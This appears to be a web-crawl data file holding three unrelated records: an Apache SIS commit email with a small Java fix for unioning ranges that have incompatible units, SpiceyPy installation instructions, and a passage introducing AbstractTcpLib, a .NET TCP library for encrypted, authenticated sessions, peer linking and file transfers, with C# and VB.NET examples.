Dataset columns: text (string, lengths 20 to 1.01M), url (string, lengths 14 to 1.25k), dump (string, lengths 9 to 15), lang (string, 4 classes), source (string, 4 classes)
This is an automated email from the ASF dual-hosted git repository.

desruisseaux pushed a commit to branch geoapi-4.0 in repository

The following commit(s) were added to refs/heads/geoapi-4.0 by this push:
     new ac5e8e0  Fix an `IllegalArgumentException` when creating a coverage with bands using incompatible units.

ac5e8e0 is described below

commit ac5e8e0fb80e6781e329bf4e6603181904d084d7
Author: Martin Desruisseaux <[email protected]>
AuthorDate: Wed Jul 7 13:10:53 2021 +0200

    Fix an `IllegalArgumentException` when creating a coverage with bands using incompatible units.
---
 .../java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java b/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java
index fc58d79..1bfad3b 100644
--- a/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java
+++ b/core/sis-feature/src/main/java/org/apache/sis/coverage/grid/ConvertedGridCoverage.java
@@ -28,6 +28,7 @@ import org.opengis.referencing.operation.TransformException;
 import org.opengis.referencing.operation.NoninvertibleTransformException;
 import org.apache.sis.referencing.operation.transform.MathTransforms;
 import org.apache.sis.coverage.SampleDimension;
+import org.apache.sis.measure.MeasurementRange;
 import org.apache.sis.measure.NumberRange;
 import org.apache.sis.image.DataType;
@@ -172,6 +173,14 @@ final class ConvertedGridCoverage extends GridCoverage {
         if (union == null) {
             union = range;
         } else {
+            /*
+             * We do not want unit conversions for this union, because the union is used
+             * only for determining a data type having the capacity to store the values.
+             * The physical meaning of those values is not relevant here.
+             */
+            if (union instanceof MeasurementRange<?>) {
+                union = new NumberRange<>(union);
+            }
             union = union.unionAny(range);
         }
     }
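For readers skimming the diff, here is a rough sketch of the idea in isolation. The class names, the copy constructor and unionAny() call are taken from the diff; the helper method and variable names are illustrative and not part of the commit:

import org.apache.sis.measure.MeasurementRange;
import org.apache.sis.measure.NumberRange;

final class UnionSketch {
    /**
     * Unions two sample-value ranges without attempting a unit conversion.
     * MeasurementRange.unionAny() would try to convert units and throw
     * IllegalArgumentException when the units are incompatible, so the unit
     * is stripped first. The union is only used to choose a data type wide
     * enough for the values, so the physical meaning does not matter here.
     */
    static NumberRange<?> unionForDataType(NumberRange<?> union, NumberRange<?> range) {
        if (union instanceof MeasurementRange<?>) {
            union = new NumberRange<>(union);   // unit-less copy, as in the diff
        }
        return union.unionAny(range);
    }
}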
https://mail-archives.eu.apache.org/mod_mbox/sis-commits/202107.mbox/%[email protected]%3E
CC-MAIN-2021-43
en
refinedweb
Installation

SpiceyPy is currently supported on Mac, Linux, FreeBSD, and Windows systems. If you are new to Python, it is a good idea to read a bit about it first. For new installations of Python, it is encouraged to install and/or update pip, setuptools, wheel, and numpy before installing SpiceyPy:

pip install -U pip setuptools wheel
pip install -U numpy

Then to install SpiceyPy, simply run:

pip install spiceypy

If you use anaconda/miniconda/conda, run:

conda config --add channels conda-forge
conda install spiceypy

Note: As of 04/10/2021, SpiceyPy has experimental support for 64-bit ARM processors for Linux and macOS (linux-aarch64 & osx-arm64) via the conda-forge distribution.

If no error was returned, you have successfully installed SpiceyPy. To verify this, you can list the installed packages via this pip command:

pip list

You should see spiceypy in the output of this command. Or you can start a Python interpreter and try importing SpiceyPy like so:

import spiceypy
# print out the toolkit version installed
print(spiceypy.tkvrsn('TOOLKIT'))

This should print out the toolkit version without any errors. You have now verified that SpiceyPy is installed.

Offline installation

If you need to install SpiceyPy without a network, or if you have a prebuilt shared library at hand, you can override the default behaviour of SpiceyPy by using the CSPICE_SRC_DIR and CSPICE_SHARED_LIB environment variables, respectively. For example, if you have downloaded SpiceyPy and the CSPICE toolkit, and extracted CSPICE to /tmp/cspice, you can run:

export CSPICE_SRC_DIR="/tmp/cspice"
python setup.py install

Or if you have a shared library of CSPICE located at /tmp/cspice.so, you can run:

export CSPICE_SHARED_LIB="/tmp/cspice.so"
python setup.py install

Both examples above assume you have cloned the SpiceyPy repository and are running those commands within the project directory.

A simple example program

This script calls the SpiceyPy function 'tkvrsn' and outputs the return value.

File tkvrsn.py:

from __future__ import print_function
import spiceypy

def print_ver():
    """Prints the TOOLKIT version"""
    print(spiceypy.tkvrsn('TOOLKIT'))

if __name__ == '__main__':
    print_ver()

From the command line, execute the function:

$ python tkvrsn.py
CSPICE_N0066

From Python, execute the function:

$ python
>>> import tkvrsn
>>> tkvrsn.print_ver()
CSPICE_N0066

SpiceyPy Documentation

The current version of SpiceyPy does not provide extensive documentation, but there are several ways to navigate your way through the Python version of the toolkit. One simple way is to use the standard Python mechanisms. All interfaces implemented in SpiceyPy can be listed using the standard built-in function dir(), which returns an alphabetized list of names comprising (among other things) the API names. If you need additional information about an API's parameters, the standard built-in function help() can be used:

>>> import spiceypy
>>> help(spiceypy.tkvrsn)

which produces:

Help on function tkvrsn in module spiceypy.spiceypy:

tkvrsn(item)
    Given an item such as the Toolkit or an entry point name, return
    the latest version string.

    :param item: Item for which a version string is desired.
    :type item: str
    :return: the latest version string.
    :rtype: str

As indicated in the help on the function, the complete documentation is available in the CSPICE toolkit documentation. Therefore it is recommended to have the CSPICE toolkit installed locally in order to access its documentation offline.
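As a small illustrative addition (not from the original page, but using only the built-ins just described), dir() can be combined with a comprehension to search the API from the interpreter:

>>> import spiceypy
>>> [name for name in dir(spiceypy) if 'vrsn' in name]
['tkvrsn']

The exact output depends on the installed version and may include other matches.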
Common Issues

SSL Alert Handshake Issue

Attention: As of 2020, users are not likely to experience this issue with Python version 3.7 and above, and with newer 3.6.x releases. Users running older operating systems are encouraged to update to newer versions of Python if they are attempting to install version 3.0.0 or above. See other sections of this document for more information.

In early 2017, JPL updated to a TLS1.2 certificate and enforced https connections, causing installation issues for users, in particular for macOS users, with OpenSSL versions older than 1.0.1g. This is because older versions of OpenSSL, still distributed in some environments, are incompatible with TLS1.2. As of late 2017, SpiceyPy has been updated with a strategy that can mitigate this issue on some systems, but it may not be totally reliable due to known deficiencies in setuptools and pip.

Another solution is to configure a new Python installation that is linked against a newer version of OpenSSL; the easiest way to do this is to install Python using homebrew, and once this is done SpiceyPy can be installed into this new installation of Python (IMHO this is the best option).

If your Python 3.6 distribution was installed from the packages available at python.org, an included command "Install Certificates.command" should be run before attempting to install SpiceyPy again. That command installs the certifi package, which can also be installed using pip. Alternatively, installing an anaconda or miniconda Python distribution and installing SpiceyPy using the conda command above is another possible workaround.

Users continuing to have issues should report an issue to the github repository.

Supporting links:

How to install from source (for bleeding edge updates)

Attention: If you have used the pip or conda install commands above, you do not need to run any of the following commands. Installing from source is intended for advanced users.

Users on machines running Windows should take note that attempting to install from source will require software such as Visual Studio and additional environment configuration. Given this complexity, Windows users are highly encouraged to stick with the releases made available through PyPI/Conda-Forge.

If you wish to install from source, first simply clone the repository by running the following in your favorite shell:

git clone

If you do not have git, you can also directly download the source code from the GitHub repo for SpiceyPy.

To install the library, simply change into the root directory of the project and then run:

python setup.py install

The installation script will download the appropriate version of the SPICE toolkit for your system, and will build a shared library from the included static library files. Then the installation script will install SpiceyPy, along with the generated shared library, into your site-packages directory.
https://spiceypy.readthedocs.io/en/v4.0.1/installation.html
CC-MAIN-2021-43
en
refinedweb
Managing State in Angular using Akita

Reading Time: 4 minutes

What is Akita?

Akita is a simple and effective state management solution for Angular applications. Akita is built on top of RxJS and inspired by models like Flux and Redux. Akita encourages simplicity. It saves you the hassle of creating boilerplate code and offers powerful tools with a moderate learning curve, suitable for experienced and inexperienced developers alike.

Akita's Architecture

The heart of Akita is the Store and the Query. A Store is a single object which contains the store state and serves as the "single source of truth." A Query is a class offering functionality responsible for querying the store.

Akita provides two types of stores: a basic store, which can hold any shape of data, and an entity store, which represents a flat collection of entities. Akita keeps the natural work process of using Angular services to encapsulate and manage asynchronous logic and store update calls.

In this article, we'll build a books application and focus on the entity store feature because, for the most part, it will be the one you'll use in your applications.

Creating the Books Application

The Book Model

The model is a representation of an entity. Let's create the Book model.

// book.model.ts
import { ID } from '@datorama/akita';

export type Book = {
  id: ID;
  name: string;
  author: string;
  genres: string[];
  description: string;
};

The Books Store

The next thing we need to do is create a books table, i.e., an EntityStore managing a Book object:

// books.store.ts
import { EntityState, EntityStore, StoreConfig } from '@datorama/akita';
import { Book } from './book.model';

export interface BooksState extends EntityState<Book> {}

@StoreConfig({ name: 'books' })
export class BooksStore extends EntityStore<BooksState, Book> {
  constructor() {
    super();
  }
}

First, we need to define the store's interface. In our case, we can make do with extending the EntityState from Akita, providing it with the Book entity type. If you are curious, EntityState has the following signature:

export interface EntityState<T> {
  entities: HashMap<T>;
  ids: ID[];
  loading: boolean;
  error: any;
}

By using this model, you'll receive from Akita a lot of built-in functionality, such as CRUD operations on entities, active entity management, error management, etc.

The Books Query

You can think of the query as being similar to a database query. Its constructor function receives as parameters its own store and possibly other query classes. Let's see how we can use it to create a books query:

// books.query.ts
import { Injectable } from '@angular/core';
import { QueryEntity, ID } from '@datorama/akita';
import { BooksStore, BooksState } from './books.store';
import { Book } from './book.model';

@Injectable()
export class BooksQuery extends QueryEntity<BooksState, Book> {
  constructor(protected store: BooksStore) {
    super(store);
  }
}

Here, you'll receive from Akita a lot of built-in functionality, including methods such as selectAll(), selectEntity(id), selectCount(), selectActive() and many more.

The Books Component

Now that we have finished Akita's setup, let's see how we can use it to display the list of books.
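One practical note first (an assumption on my part; the original article does not show this wiring): the component below injects BooksQuery and BooksService, so the store, query and service need to be registered with Angular's dependency injection, for example as module providers. With modern Angular you may also need @Injectable() on each class:

// books.module.ts (illustrative; file and module names are assumptions)
import { NgModule } from '@angular/core';
import { BooksStore } from './books.store';
import { BooksQuery } from './books.query';
import { BooksService } from './books.service';

@NgModule({
  providers: [BooksStore, BooksQuery, BooksService]
})
export class BooksModule {}

With that wiring in place, here is the component: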
// books.component.ts
@Component({
  templateUrl: './books.component.html'
})
export class BooksComponent implements OnInit {
  books$: Observable<Book[]>;
  selectLoading$: Observable<boolean>;

  constructor(
    private booksQuery: BooksQuery,
    private booksService: BooksService
  ) {}

  ngOnInit() {
    this.books$ = this.booksQuery.selectAll();
    this.selectLoading$ = this.booksQuery.selectLoading();
    this.getBooks();
  }

  getBooks() {
    if (this.booksQuery.isPristine) {
      this.booksService.getBooks();
    }
  }
}

The selectLoading() is a query method from Akita that reactively provides the value of the loading key from the store. The initial value of the loading state is set to true and is switched to false when you call store.set(). We'll take advantage of this feature for toggling a spinner in our view.

The selectAll() is self-explanatory: it selects the entire store's entity collection reactively.

Next, we want to call our books endpoint in order to fetch the books from the server only the first time. When using an entity store, its initial state is pristine, and when you call store.set(), Akita changes that to false. This can be used to determine whether the data is already present in the store, to save on additional server requests.

The Books Service

Let's see the getBooks() method.

// books.service.ts
export class BooksService {
  constructor(private booksStore: BooksStore) {}

  getBooks() {
    timer(300)
      .pipe(mapTo(booksMock))
      .subscribe(books => {
        this.booksStore.set(books);
      });
  }
}

The getBooks() method is responsible for fetching the books from the server and adding them to the store. (In real life, this will be a real API call.)

Let's also see how easily we can add sort-by functionality with Akita.

export class BooksComponent implements OnInit {
  books$: Observable<Book[]>;
  selectLoading$: Observable<boolean>;
  sortControl = new FormControl('price');

  ngOnInit() {
    this.books$ = this.sortControl.valueChanges.pipe(
      startWith('price'),
      switchMap(sortBy => this.booksQuery.selectAll({ sortBy }))
    );
  }
}

The selectAll() method supports sorting the entities collection based on an entity key. We can listen to the control's value changes and let Akita sort the collection accordingly.

We have one more requirement: when the user clicks on a book, we need to navigate to the book page, showing the full content.

The Book Component

We'll leave it to you to set up a new route (a sketch of one possible setup appears at the end of this section). Let's create the book component.

// book.component.ts
@Component({
  templateUrl: './book.component.html'
})
export class BookComponent implements OnInit {
  book$ = this.booksQuery.selectEntity(this.bookId);

  constructor(
    private activatedRoute: ActivatedRoute,
    private booksService: BooksService,
    private booksQuery: BooksQuery
  ) {}

  ngOnInit() {
    if (this.booksQuery.hasEntity(this.bookId) === false) {
      this.booksService.getBook(this.bookId);
    }
  }

  get bookId() {
    return this.activatedRoute.snapshot.params.id;
  }
}

We have a book$ observable that reactively returns the current book entity based on the ID we get from the router. A user has the ability to navigate directly to a book's page, so we need to check whether that book entity exists in the books store (via the query's hasEntity() method). If the store doesn't have the book, we need to fetch it from the server and update the store.

// books.service.ts
export class BooksService {
  getBook(id: ID) {
    timer(300)
      .pipe(mapTo(bookMock))
      .subscribe(book => {
        this.booksStore.add(book);
      });
  }
}

Summary

We've seen here how the various core concepts of Akita work together to give us an easy way to manage a bookstore.
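As promised above, here is one possible route setup for the book page. The paths, file names, and module layout here are my assumptions; the article itself leaves this to the reader:

// books-routing.module.ts (illustrative)
import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { BooksComponent } from './books.component';
import { BookComponent } from './book.component';

const routes: Routes = [
  { path: 'books', component: BooksComponent },
  { path: 'books/:id', component: BookComponent } // BookComponent reads `id`
];

@NgModule({
  imports: [RouterModule.forChild(routes)],
  exports: [RouterModule]
})
export class BooksRoutingModule {}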
This is only a small taste of Akita; it has many more features, such as powerful plugins, dev tools, a CLI, support for active state, transactions, web workers, etc. I encourage you to explore the API by reading the docs and the source code of the demo application.

Complete Code Example

You can view the complete runnable example here and the source code here.

About the Author

Netanel is a Frontend Architect who works at Datorama, blogs at, open source maintainer, creator of Akita and Spectator, husband, father and the co-founder of HotJS.
https://blog.ng-book.com/managing-state-in-angular-using-akita/
CC-MAIN-2021-43
en
refinedweb
This is the continuation of the Web API Versioning series. In the previous two articles we have learned:

• why versioning is required (read here), and
• versioning using the URI (read here).

In this article we will learn how to implement versioning using the query string.

Till now we have two API controllers:

1. SilverEmployeeServiceController, which returns an employee's Name, Id and Salary.
2. GoldEmployeeServiceController, which returns an employee's First Name, Last Name, Id and Salary.

Our clients know nothing about the real implementation; they just know that they are consuming EmployeeService and that there exist two versions of the service. In order to consume the service they have to pass the version number along with the URL, and it's our duty to tell our clients how they can pass the version number. There are many ways in which the version number can be passed, like:

1. In the form of routed data (versioning using URI).
2. In the form of a query string (versioning using query string).
3. In the form of a custom header (versioning using custom header).
4. In the form of the Accept header (versioning using accept header).
5. In the form of custom media types (versioning using custom media types).

Web API versioning using the query string simply means that clients specify the version number as a query string parameter, like api/EmployeeService?v=1.

So, our work is to tell Web API to select the appropriate controller based on the version number specified by the client as a query string parameter:

• If the client passes v=1, then we have to tell Web API to select the SilverEmployeeService controller.
• If the client passes v=2, then we have to tell Web API to select the GoldEmployeeService controller.

In the previous case, when the client was passing the version number as a routed data value, telling Web API to select an appropriate controller based on the version number was easy through routing. But when the version number is being passed as a query string parameter, routing is obviously not going to help; we can't define any route based on a query string value. So we have to dive deep and try to understand how exactly Web API selects a controller when a request is issued to a Web API service, and whether there is any way to tweak the default implementation for controller selection.

How Web API Selects a Controller

Let us understand how a controller is selected when a request is issued to a URI such as api/EmployeeService/3.

• Web API has a class called DefaultHttpControllerSelector, which is responsible for controller mapping.
• The DefaultHttpControllerSelector class has a method called SelectController() that collects information from the URI and selects the appropriate controller for processing the request.

Now, in the URI we have the following information:

1. Name of the controller - EmployeeService
2. Value of the id parameter - 3

So from the URI, the SelectController() method takes the name of the controller, in this case "EmployeeService", finds "EmployeeServiceController" and returns it. This is the default implementation that works behind the scenes.

But what do we want? For the URL api/EmployeeService?v=1, we want Web API to select the SilverEmployeeServiceController. But we know Web API will try to find EmployeeServiceController, as it gets EmployeeService as the controller name from the URI, and since no such controller exists in our application, an error will be thrown.
Now, what else could we do to tell Web API to select the controller based on the query string parameter (version number)?

The DefaultHttpControllerSelector class allows us to extend the SelectController() method, as it is marked virtual. So, in order to tell Web API to select the controller based on the query string value, we have to extend the SelectController() method and give it our own custom implementation.

Step 1. Add a folder in the solution and name it Custom.

Step 2. Add a class file and name it CustomControllerSelector.

Step 3. Inherit this class from DefaultHttpControllerSelector and override the SelectController() method, like below.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Net.Http;
using System.Text.RegularExpressions;
using System.Web;
using System.Web.Http;
using System.Web.Http.Controllers;
using System.Web.Http.Dispatcher;

namespace MyFirstAPIProject.Custom
{
    public class CustomControllerSelector : DefaultHttpControllerSelector
    {
        private HttpConfiguration _config;

        public CustomControllerSelector(HttpConfiguration config) : base(config)
        {
            _config = config;
        }

        public override HttpControllerDescriptor SelectController(HttpRequestMessage request)
        {
            // Get all the available Web API controllers
            var controllers = GetControllerMapping();

            // Get the controller name and parameter values from the request URI
            var routeData = request.GetRouteData();

            // Get the controller name from route data.
            // The name of the controller in our case is "EmployeeService"
            var controllerName = routeData.Values["controller"].ToString();

            // Default version number to 1
            string versionNumber = "1";

            var versionQueryString = HttpUtility.ParseQueryString(request.RequestUri.Query);
            if (versionQueryString["v"] != null)
            {
                versionNumber = versionQueryString["v"];
            }

            if (versionNumber == "1")
            {
                // If the version number is 1, prepend "Silver" to the controller name.
                // So at this point the controller name will become SilverEmployeeService
                controllerName = "Silver" + controllerName;
            }
            else
            {
                // If the version number is 2, prepend "Gold" to the controller name.
                // So at this point the controller name will become GoldEmployeeService
                controllerName = "Gold" + controllerName;
            }

            HttpControllerDescriptor controllerDescriptor;
            if (controllers.TryGetValue(controllerName, out controllerDescriptor))
            {
                return controllerDescriptor;
            }
            return null;
        }
    }
}

The implementation is simple and straightforward: we are getting the version number from the query string and changing the controller name accordingly.

Step 4. Tell Web API to use CustomControllerSelector instead of the default one, by replacing the IHttpControllerSelector service with a CustomControllerSelector instance in the WebApiConfig.cs file, which resides under the App_Start folder.

namespace MyFirstAPIProject
{
    public static class WebApiConfig
    {
        public static void Register(HttpConfiguration config)
        {
            config.Services.Replace(typeof(IHttpControllerSelector),
                new CustomControllerSelector(config));

            config.Routes.MapHttpRoute(
                name: "DefaultApi",
                routeTemplate: "api/{controller}/{id}",
                defaults: new { id = RouteParameter.Optional }
            );
        }
    }
}

Now, run the application and fire two GET requests on behalf of two different clients, like below, and test the results.
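For example (the host and port are placeholders; substitute whatever your application runs on):

GET http://localhost:1234/api/EmployeeService?v=1   -> handled by SilverEmployeeServiceController
GET http://localhost:1234/api/EmployeeService?v=2   -> handled by GoldEmployeeServiceController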
https://www.sharpencode.com/article/WebApi/web-api-versioning/using-querystring-parameters
CC-MAIN-2021-43
en
refinedweb
AbstractTcpLib is a TCP communications library that provides the functionality I have come to believe is the bare minimum that should be available in a TCP library. Using this library, you will be able to easily create and manage TCP connections between client and server, and communicate not only between the client and server but also client to client. This library also provides AES256-encrypted communication, Windows authentication, multiple concurrent file transfers to and from the same client, and object serialization for convenient transfer of data between remote machines.

When I first started working with TCP communications, I hated the idea of creating several TCP connections from a single application to a server. It seemed sloppy. It also seemed like I was cheating, because I believed that I should be able to do all the communicating I needed to over a single session. After all, bytes are bytes, right? If you have a connection to a server, you have a connection to a server. Over the years I came up with different ways to logically separate and manage the data I was sending - but there's just nothing like having an entire session to work with when sending whatever you have to send. So instead of coming up with yet another way to synchronize data between the client and the server, I built a session management system into this library.

In this library, sessions really can contain other sessions. They're called sub-sessions, and these are the communication channels you will use for everything that you need to logically separate. The beauty of this is that your network hardware and the routers between your local machine and your remote machine will handle the bandwidth balancing between data sent over your subsessions, so while your overall bandwidth per subsession may decrease, they all get as much bandwidth as your switch and router(s) can provide, no matter what is being sent over them.

Once I had the subsession management system in place, another thought occurred to me. If I have a client that handles and manages (potentially) lots of TCP sessions, what if I logically connected two subsessions belonging to different clients at the server? If it was done correctly, data sent from client 1 over this linked subsession would naturally flow to the other client... and the other client would be able to send data to client 1. All we need is a server that is smart enough to do the associations when we ask it to. We would also need to be able to get a list of connected clients, and clear error messages in the event that we asked the server to create a linked subsession and for some reason it couldn't. Of course, this is peer-to-peer communication. In this library, we're calling it "sub-session linking". Linked subsessions can be created between any two connected clients.

Most TCP libraries out there will allow you to send text, but if you want to send anything else you need to convert the data into a string or a byte array. I spent a long time doing that, and it gets old. It forces you to do quite a bit of parsing, converting strings to byte arrays and converting classes to XML, and XML back into classes in your code. The more different kinds of data you need to send, the more of this there is. Things tend to get ugly fast. This library has only a single .Send() function in the Client and Session classes for sending data. If you use it the way I intended, you will never even think about sending bytes again - because this library's .Send() function accepts any .NET serializable object.
You drop your string into the Send() function, and you get a string on the other end. Have a DataTable to send? Drop it in the Send() function. Have some of your own classes to send? Mark them as serializable, and drop them into the Send() function - and off they go.

For this reason, I named the library AbstractTcpLib: because it abstracts you from the details of sending your data.

Of course, serializing objects and deserializing them at the remote end uses some CPU resources. I'm using the .NET binary serializer, and although it is relatively fast and efficient, those among us who are interested in raw performance will see this as an issue. The good news is that byte arrays aren't serialized. Why? Because, well - that would be silly. The Socket class sends byte arrays. Serializing a byte array would just use CPU resources needlessly, and add a few bytes to the byte array to include information about the byte array object - all for nothing. So if you really want to send Byte[] because you want the best possible network performance, or you're concerned about the binary serializer for one reason or another, or you just would rather work with bytes - then go right ahead. Just drop your byte array into the .Send() function.

Everyone is concerned about security these days. I consult for an access control and video surveillance company, and of course security is at the top of their list of priorities. Everything must be encrypted. Everything must be authenticated. It's so important in our society today that it seems to me no communications library can be considered complete without security functionality of some kind. In this library, I included two different methods of implementing security measures:

AES256 Encryption: The server class works in two modes - encrypted mode and mixed mode. In encrypted mode, all clients must have the correct pre-shared key to connect. Connecting clients are required to register themselves with the server as either a session or a subsession immediately upon connection. If the server can not decrypt this registration request with its own PSK, the connection is rejected and the client will simply be disconnected with no error message whatsoever. If the server can decrypt the registration request, it immediately changes the session PSK to a new randomly generated one using RNGCryptoServiceProvider.

LDAP Authentication: The server can be configured to require Windows authentication. Before connecting with your Client, enter credentials using the .Login(username, password) function. Credentials are immediately stored as encrypted strings, and passed to the server in the registration request. The server will attempt to authenticate the credentials against the domain the server machine is in, so sending a domain along with the username (i.e. domain\username) is not necessary. If the server is not in a domain, it will attempt to authenticate against the Windows workstation it is running on. If the client's authentication fails, it receives an "authentication failure" message and is disconnected.

Mixed Mode vs Encrypted Mode: In mixed mode, clients can create encrypted sessions or subsessions if they choose. It's important to know that if a server is configured to require authentication, but not to require encryption, and you create non-encrypted sessions or subsessions, then your Windows credentials are being sent as serialized strings - and this is not secure.
If you configure the server to require authentication, use encryption also.

So you need to send a file. Ok, great - this library has you covered. Need to send two? Sure, of course. How would you like to send them - one at a time, or both at the same time? Or maybe three or four at the same time? It's completely up to you and what you think your hardware can handle.

AbstractTcpLib sends files over subsessions. In fact, if you look at the Client class, you won't see a SendFile() or GetFile() function there at all - those functions live in the Session class. You create a file transfer by first creating a subsession or two. Then you get a reference to your subsessions (which are Session objects) by using Client.GetSubSession(), and then call Session.SendFile() or Session.GetFile().

You can create as many as you like, and you can transfer files between your client and your server, or between your client and another connected client. To transfer files between clients, create a linked subsession first. Then get a reference to it using Client.GetSubSession() the same way you would any other subsession.

Subscribing to File Transfer Events: There are three delegates to subscribe to when initiating or receiving a file transfer: TransferProgress(UInt16 percentComplete), TransferError(String errorMessage), and TransferComplete(). I believe this is self-explanatory, and they work the way you think they will. If you have any questions, please feel free to ask.

Files are transferred using the FileTransfer class. During a transfer, a file transfer object will be associated with each end of a subsession. Subscribing to the Server.receivingAFile(FileTransfer) or Client.receivingAFile(FileTransfer) delegate will allow you to become aware of when you are receiving a file, and you can also subscribe to the transferProgress, transferError and transferComplete delegates on the FileTransfer object so you can track the progress of the incoming file. If you don't want to allow the transfer to continue, you can always .Cancel() the transfer on the receiving end before it completes.

The Client, Server and Session classes talk to each other using XML. Because this library serializes sent objects, I never needed to parse any XML myself. Instead, I used an XML parser I built called XmlObject. Using XmlObject and this library's ability to serialize objects and pass them back and forth, I was able to easily and clearly create XmlObject(s), add parameters and other data, pass them to a remote machine where they arrive as XmlObjects, and use the tools available in the XmlObject class to easily get at the passed data.

This library allows some of that communication to be filtered up to you, so that you are notified when sessions disconnect, when they connect and register themselves, when subsessions are created, when there is a connection failure due to incompatible encryption keys, authentication failure, etc. So your client and server will be receiving XmlObjects in your callbacks. Don't be afraid... they are your friends.

Both the server and the client use a delegate to pass you incoming data (your sent objects) as it comes in. These delegates have a single CommData object as a parameter.
A CommData object is just a wrapper for your passed object. It contains the serialized byte array that came in, and a deSerialized Object that is the object you put into Send() - only it isn't your String, it's an Object. You could simply test it to make sure it's your String using typeof(String) and then cast it to a String or var, or use CommData.GetObject(), like this:

C#:

this.client = new Client((Core.CommData data) =>
{
    // Get the passed object:
    var o = data.deSerialized;
    if (o.GetType() == typeof(XmlObject) && ((XmlObject)o).Name.Equals("ATcpLib"))
    {
        XmlObject xml = (XmlObject)data.deSerialized;
        String msg = xml.GetAttribute("", "internal");
        String originId = xml.GetAttribute("", "id");

        // Are we shutting down?
        if (msg.Contains("disconnected") && originId.Equals(client.GetConnectionId()))
        {
            UI(() =>
            {
                lblStatus.Text = "Disconnected.";
                btConnect.Text = "Connect";
                lbSubSessions.Items.Clear();
            });
        }

        if (msg.Contains("CreateSubSession") && originId.Equals(client.GetConnectionId()) &&
            xml.GetAttribute("", "status").Equals("true"))
        {
            UI(() =>
            {
                lbSubSessions.Items.Add(xml.GetAttribute("", "subSessionName"));
            });
        }

        // Is a SubSession shutting down?
        if (msg.Contains("disconnected") && !originId.Equals(client.GetConnectionId()))

VB.NET:

Me.client = New Client(Function(ByVal data As Core.CommData)
    Dim o = data.deSerialized
    If o.[GetType]() = GetType(XmlObject) AndAlso (CType(o, XmlObject)).Name.Equals("ATcpLib") Then
        Dim xml As XmlObject = CType(data.deSerialized, XmlObject)
        Dim msg As String = xml.GetAttribute("", "internal")
        Dim originId As String = xml.GetAttribute("", "id")

        If msg.Contains("disconnected") AndAlso originId.Equals(client.GetConnectionId()) Then
            UI(Function()
                lblStatus.Text = "Disconnected."
                btConnect.Text = "Connect"
                lbSubSessions.Items.Clear()
            End Function)
        End If

        If msg.Contains("CreateSubSession") AndAlso originId.Equals(client.GetConnectionId()) AndAlso xml.GetAttribute("", "status").Equals("true") Then
            UI(Function()
                lbSubSessions.Items.Add(xml.GetAttribute("", "subSessionName"))
            End Function)
        End If

        If msg.Contains("disconnected") AndAlso Not originId.Equals(client.GetConnectionId()) Then

As you see, the client's constructor takes the incoming-data delegate. You connect to the server as follows:

C#:

String errMsg = "";
client.Login(tbUserName.Text, tbPassword.Text);
if (!client.Connect(System.Net.IPAddress.Parse(tbIpAddress.Text.Trim()),
    ushort.Parse(tbPort.Text.Trim()), tbSessionId.Text.Trim(), out errMsg,
    cbUseEncryption.Checked, tbPsk.Text))
{
    MessageBox.Show(errMsg, "Connection failed.", MessageBoxButtons.OK, MessageBoxIcon.Error);
    return;
}

VB.NET:

Dim errMsg As String = ""
client.Login(tbUserName.Text, tbPassword.Text)
If Not Me.client.Connect(System.Net.IPAddress.Parse(tbIpAddress.Text.Trim()),
    UShort.Parse(tbPort.Text.Trim()), tbSessionId.Text.Trim(), errMsg,
    cbUseEncryption.Checked, tbPsk.Text) Then
    client.Close()
    MessageBox.Show(errMsg, "Connection failed.", MessageBoxButtons.OK, MessageBoxIcon.[Error])
    Return
End If

When you connect, a session object is created to handle your client's connection to the server, and added to the server's SessionCollection. You can send objects to the server using your session if you choose, or you can create subsessions.

Subsessions are sessions also. When you create a subsession with your client, a Session object is created and added to your client's subsession collection.
On the server, your subsession is registered and added to your session's subsession collection. To send data to the server (or to a peer) over your client's session, use the Client.Send() (or Session.Send()) function, as follows:

C#:

String errMsg = "";
if (!client.Send(tbMessage.Text, out errMsg))
{
    MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error);
}

VB.NET:

Dim errMsg As String = ""
If Not client.Send(tbMessage.Text, errMsg) Then
    MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error)
End If

To send data over a subsession, first get the subsession using its name (String sessionId), as follows:

C#:

Session session = null;
String errMsg = "";
if (!client.GetSubSession(lbSubSessions.SelectedItems[0].ToString(), out session, out errMsg))
{
    MessageBox.Show(errMsg, "Could not get subsession.", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
else
{
    if (!session.Send(tbMessage.Text, out errMsg))
    {
        MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error);
    }
}

VB.NET:

Dim session As Session = Nothing
Dim errMsg As String = ""
If Not client.GetSubSession(lbSubSessions.SelectedItems(0).ToString(), session, errMsg) Then
    MessageBox.Show(errMsg, "Could not get subsession.", MessageBoxButtons.OK, MessageBoxIcon.Error)
Else
    If Not session.Send(tbMessage.Text, errMsg) Then
        MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error)
    End If
End If

To subscribe to the server's (or client's) incoming FileTransfer delegate, do it as follows (this example is taken from the example application; as such, it is updating a ListView with the transfer's information):

C#:

server.receivingAFile = (FileTransfer transfer) =>
{
    ListViewItem lvi = new ListViewItem(transfer.FileName());
    FileTransfer.TransferComplete complete = null;
    FileTransfer.TransferProgress updateProgress = null;
    FileTransfer.TransferError transferError = null;

    lvi.SubItems.Add("0%");
    lvi.SubItems.Add(transfer.DestinationFolder());
    lvi.SubItems.Add("Transfering file");

    complete = () =>
    {
        UI(() => lvi.SubItems[3].Text = "Complete");
        transfer.transferComplete -= complete;
        transfer.transferError -= transferError;
        transfer.transferProgress -= updateProgress;
    };

    updateProgress = (ushort percentComplete) =>
    {
        UI(() =>
        {
            lvIncommingFiles.BeginUpdate();
            lvi.SubItems[1].Text = percentComplete.ToString() + "%";
            lvIncommingFiles.EndUpdate();
        });
    };

    transferError = (String errorMessage) =>
    {
        UI(() =>
        {
            lvi.SubItems[2].Text = "Error: " + errorMessage;
            lvi.ForeColor = Color.Red;
        });
